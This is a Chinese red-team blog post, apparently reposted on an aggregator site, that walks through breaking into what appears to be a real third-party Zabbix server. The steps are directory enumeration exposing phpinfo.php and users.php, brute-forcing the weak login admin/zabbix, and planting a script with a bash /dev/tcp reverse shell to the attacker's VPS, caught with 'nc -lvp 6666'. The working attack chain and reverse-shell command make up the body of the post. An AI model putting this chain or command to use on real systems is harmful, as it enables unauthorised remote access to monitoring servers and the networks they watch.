『实战渗透』Zabbix 您所在的位置:网站首页 zabbix账号密码 『实战渗透』Zabbix

『实战渗透』Zabbix

2023-08-19 10:29| 来源: 网络整理| 查看: 265

saulGoodman

一个专注于红队攻防研究的公众号

关注

Zabbix-弱口令再到命令执行Getshell

信息搜集

先是枚举了一下目录:

得到了一些可利用的文件:

[06:13:52] 200 - 86KB - /phpinfo.php [06:13:56] 200 - 2KB - /setup.php [06:14:01] 200 - 2KB - /users.php

phpinfo中可以得到一些信息:用的是Linux操作系统:

通过DOCUMENT_ROOT函数得知网站的绝对路径是/opt/httpd-2.4.29/htdocs:

接着来到:http://xx.xx.xx.xx/setup.php,是一个安装页面,不管他。要是我重新给他安装了web,我估计第二天就能去警察叔叔那里喝茶谈人生了

第三个页面是:http://xx.xx.xx.xx/users.php:

弱口令

掏出我的BurpSuite+大字典集合得到账号密码为:admin / zabbix 进入到了后台:

Getshell

在管理-脚本-创建脚本写入反弹shell命令:

bash -i >& /dev/tcp/VPS的IP/6666 0>&1

在监测-问题处打开一个主机,然后找到刚刚创建的脚本power-liu:

这个时候我们的 VPS 用 nc 监听 :

nc -lvp 6666

即可成功反弹一枚 shell!

由于网络安全法的原因,我没深入!点到为止就好了



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有